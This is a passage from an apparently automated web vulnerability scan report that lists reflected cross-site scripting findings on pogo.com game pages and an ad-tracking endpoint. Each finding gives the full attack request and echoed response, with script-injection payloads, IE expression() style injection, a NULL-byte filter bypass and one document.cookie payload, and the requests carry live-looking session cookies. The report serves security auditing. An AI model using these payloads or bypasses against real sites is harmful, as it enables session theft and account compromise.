<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... les */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="newGames;Cake Mania To The Max" var s_eVar1="" var s_eVar2="" var s_eVar6="pogofree010711.8cad4";alert(1)//fef0500bb88"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="102"; var s_ ...[SNIP]...
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86f7"%3b2ec25516e2f was submitted in the RefID parameter. This input was echoed as c86f7";2ec25516e2f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=c86f7"%3b2ec25516e2f&Session=&origin=HPTemplateGameList&ln=en HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 48209 Cache-Control: private, max-age=14385 Date: Sun, 09 Jan 2011 02:08:58 GMT Connection: close
<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... ommerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle;Cradle Of Rome 2 Premium" var s_eVar1="" var s_eVar2="" var s_eVar6="c86f7";2ec25516e2f"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d1b"style%3d"x%3aexpr/**/ession(alert(1))"3e8fc95c0c2 was submitted in the RefID parameter. This input was echoed as a1d1b"style="x:expr/**/ession(alert(1))"3e8fc95c0c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code=119761357&RefID=pogofree010711a1d1b"style%3d"x%3aexpr/**/ession(alert(1))"3e8fc95c0c2 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 41016 Cache-Control: private, max-age=14386 Date: Sun, 09 Jan 2011 02:08:48 GMT Connection: close
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481fc"style%3d"x%3aexpr/**/ession(alert(1))"ad9a6c7f32 was submitted in the RefID parameter. This input was echoed as 481fc"style="x:expr/**/ession(alert(1))"ad9a6c7f32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=481fc"style%3d"x%3aexpr/**/ession(alert(1))"ad9a6c7f32&Session=&origin=HPTemplateGameList&ln=en HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 50333 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:08:56 GMT Connection: close
The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f38fc"style%3d"x%3aexpr/**/ession(alert(1))"e6b6265f679 was submitted in the origin parameter. This input was echoed as f38fc"style="x:expr/**/ession(alert(1))"e6b6265f679 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code=119714967&genre=Puzzle&RefID=headernav_fp_shopmenu&Session=&origin=HPTemplateGameListf38fc"style%3d"x%3aexpr/**/ession(alert(1))"e6b6265f679&ln=en HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 51683 Cache-Control: private, max-age=14366 Date: Sun, 09 Jan 2011 02:09:35 GMT Connection: close
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00fb3e9"-alert(1)-"008cc735cb4 was submitted in the refid parameter. This input was echoed as fb3e9"-alert(1)-"008cc735cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /deluxe.aspx?code=11964850&refid=14hero_bj3b%00fb3e9"-alert(1)-"008cc735cb4&intcmp=14hero_bj3b&pageSection=free_home_spotlight HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 49260 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:08:54 GMT Connection: close
<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle;Bejeweled 3" var s_eVar1="" var s_eVar2="" var s_eVar6="14hero_bj3b.fb3e9"-alert(1)-"008cc735cb4"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e35b8"style%3d"x%3aexpr/**/ession(alert(1))"2417bd62531 was submitted in the refid parameter. This input was echoed as e35b8"style="x:expr/**/ession(alert(1))"2417bd62531 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deluxe.aspx?code=11964850&refid=14ma_bj3e35b8"style%3d"x%3aexpr/**/ession(alert(1))"2417bd62531&pageSection=free_home_marketing_alley HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 50504 Cache-Control: private, max-age=14356 Date: Sun, 09 Jan 2011 02:08:47 GMT Connection: close
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc08"%3balert(1)//ff4a98db4bc was submitted in the refid parameter. This input was echoed as 6cc08";alert(1)//ff4a98db4bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deluxe.aspx?code=11964850&refid=14ma_bj36cc08"%3balert(1)//ff4a98db4bc&pageSection=free_home_marketing_alley HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 48974 Cache-Control: private, max-age=14353 Date: Sun, 09 Jan 2011 02:08:52 GMT Connection: close
<script type="text/javascript" language="javascript" src="/JavaScri ...[SNIP]... * E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="prodView" var s_products="puzzle;Bejeweled 3" var s_eVar1="" var s_eVar2="" var s_eVar6="14ma_bj36cc08";alert(1)//ff4a98db4bc"; var s_eVar7="Game Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f64dd"%3balert(1)//6499779a148 was submitted in the refid parameter. This input was echoed as f64dd";alert(1)//6499779a148 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /downloads.aspx?site=pogo&refid=f64dd"%3balert(1)//6499779a148&ifw=756&pageSection=homnav_downloads_store&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 134288 Cache-Control: private, max-age=14351 Date: Sun, 09 Jan 2011 02:11:09 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]...
var s_pageName="HomePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="f64dd";alert(1)//6499779a148"; var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="121"; var s_ ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 379da<script>alert(1)</script>ca2fdb18c7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&uid=ZC45X9Axu6NOUFfX_261541379da<script>alert(1)</script>ca2fdb18c7&xy=0%2C0&wh=728%2C90&vchannel=65044&cid=101198&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7120D2DE321902B7B3818D64D2E6B825; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 144 Date: Sun, 09 Jan 2011 02:14:36 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_261541379da<script>alert(1)</script>ca2fdb18c7");
3.492. http://flash-games.pogo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://flash-games.pogo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67868"><script>alert(1)</script>789ef577dda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?67868"><script>alert(1)</script>789ef577dda=1 HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://flash-games.pogo.com/?67868"><script>alert(1)</script>789ef577dda=1"/> ...[SNIP]...
3.493. http://game3.pogo.com/exhibit/game/game.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://game3.pogo.com
Path:
/exhibit/game/game.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538d5"%3balert(1)//b87d69317dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 538d5";alert(1)//b87d69317dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/game/game.jsp?site=pogo&game=scrabble&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.&init=1&538d5"%3balert(1)//b87d69317dd=1 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/game/frameset.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&install=true&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8279c"><script>alert(1)</script>c01d161abf6 was submitted in the ahst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=8279c"><script>alert(1)</script>c01d161abf6&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481a1"><script>alert(1)</script>576b5d6378a was submitted in the anam parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=481a1"><script>alert(1)</script>576b5d6378a&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f60b"><script>alert(1)</script>03774fbd27d was submitted in the apid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=9f60b"><script>alert(1)</script>03774fbd27d&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ecf"><script>alert(1)</script>379a9cf2e56 was submitted in the auto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
